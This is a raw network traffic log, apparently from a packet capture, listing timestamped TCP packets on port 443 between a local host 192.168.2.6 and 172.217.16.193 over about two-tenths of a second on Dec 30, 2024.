                                                                                                  Dec 30, 2024 10:57:07.879709959 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879723072 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.879729033 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879776955 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879780054 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.879786015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879822016 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884774923 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884865999 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884896994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884922981 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884927034 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884974003 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884979010 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889487028 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889523983 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889529943 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889534950 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889576912 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889580965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889723063 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889755964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889774084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889777899 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889826059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.893965006 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894020081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894049883 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894062996 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.894068003 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894099951 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.894104958 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.897973061 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898020029 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898041964 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898047924 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898077965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898091078 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898096085 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898175955 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898183107 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.901782036 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.901829004 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.901834965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902028084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902060032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902070045 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.902075052 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902112961 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.902117968 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.905999899 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906037092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906059027 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.906064987 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906106949 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.906196117 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906250000 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906289101 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.906295061 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910034895 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910083055 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910103083 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.910108089 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910140991 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910161972 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.910167933 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.910223961 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.910316944 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916093111 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916126013 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916157007 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.916158915 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916167974 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916222095 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.916353941 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.916414022 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.916419029 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.925976992 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.926019907 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.926026106 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.926209927 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.926244020 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.926259995 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.926265001 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.926311970 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.926316023 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.931931973 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.931965113 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.931981087 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.931986094 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.932020903 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.932029009 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.932034016 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.932084084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.932087898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937527895 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937560081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937576056 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.937581062 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937621117 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.937624931 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937804937 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.937922001 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.937927008 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943025112 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943068027 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.943073034 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943218946 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943259001 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943269014 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.943274021 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.943330050 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.948452950 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.948507071 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.948537111 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.948544979 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.948549986 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.948590040 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.948656082 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953821898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953855991 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953866959 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.953871965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953917980 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.953919888 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953928947 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.953978062 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.953982115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957065105 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957101107 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957112074 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.957117081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957165003 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.957173109 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957252026 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957283974 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957290888 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.957298994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.957334995 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.962201118 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.962258101 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.962291002 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.962301016 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.962306023 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.962337971 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.962342024 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967344999 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967386007 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.967391014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967474937 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967509031 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.967514038 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967546940 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.967583895 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.967587948 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972198963 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972232103 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972248077 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.972254038 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972294092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972304106 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.972307920 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972347975 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972351074 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.972357035 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.972393990 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.976569891 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.976679087 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.976703882 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.976722956 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.976730108 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.976774931 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.977057934 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980659008 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980693102 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980698109 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.980707884 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980750084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980751991 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.980757952 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.980808973 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.980814934 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984358072 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984411955 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.984416962 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984587908 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984637022 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.984641075 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984690905 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.984725952 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.984730959 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988765001 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988801956 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988811016 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.988826990 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988861084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988882065 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.988889933 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.988925934 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.988961935 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992480040 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992527962 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.992533922 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992701054 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992732048 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992739916 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.992746115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.992789984 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.992993116 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998687983 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998723984 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998739004 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.998744011 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998794079 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.998794079 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998805046 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.998835087 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.998840094 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.008862972 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.008897066 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.008908987 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.008913994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.008958101 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.009047031 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.009105921 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.009278059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.009284019 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014462948 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014496088 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014507055 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.014512062 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014542103 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014563084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.014566898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.014625072 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.014630079 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020205021 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020237923 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020261049 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.020266056 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020304918 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020308971 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.020313978 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.020353079 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.020356894 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025634050 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025671005 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025698900 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.025703907 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025737047 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025744915 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.025749922 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.025806904 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.025810957 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031164885 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031203032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031204939 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.031212091 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031254053 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.031259060 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031285048 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.031343937 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.031347990 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036509991 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036537886 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036556005 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.036561012 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036603928 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.036604881 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036613941 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036652088 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.036655903 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039856911 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039882898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039902925 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.039907932 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039951086 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039963961 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.039968014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.040004969 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.040355921 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044776917 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044800997 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044820070 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.044826031 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044879913 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.044998884 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.045042992 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.045080900 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.045085907 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.049938917 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.049982071 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.049987078 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050097942 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050128937 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050152063 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.050160885 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050205946 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.054790020 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055006981 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055039883 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055047989 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055052042 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055089951 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055095911 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055099964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055131912 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055136919 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059328079 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059361935 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059372902 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.059377909 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059415102 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059426069 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.059429884 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059472084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063206911 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063270092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063303947 CET44349711172.217.16.193192.168.2.6
